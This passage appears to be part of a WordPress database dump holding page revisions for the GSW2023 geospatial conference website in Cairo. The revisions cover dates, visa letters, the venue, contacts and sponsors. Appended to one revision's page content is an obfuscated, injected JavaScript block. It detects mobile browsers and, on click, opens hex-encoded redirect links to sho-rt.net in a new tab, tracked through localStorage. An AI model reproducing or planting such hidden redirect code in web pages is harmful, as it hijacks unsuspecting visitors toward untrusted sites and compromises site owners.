Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:53:16','2023-08-13 03:53:16','',3066,'https://gsw2023.com/?p=5098',0,'revision','',0),
(5099,1,'2023-08-13 03:54:22','2023-08-13 03:54:22','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 150px !important;}\"]\r\n\r\n<img class=\"alignnone wp-image-5093 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 95px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" 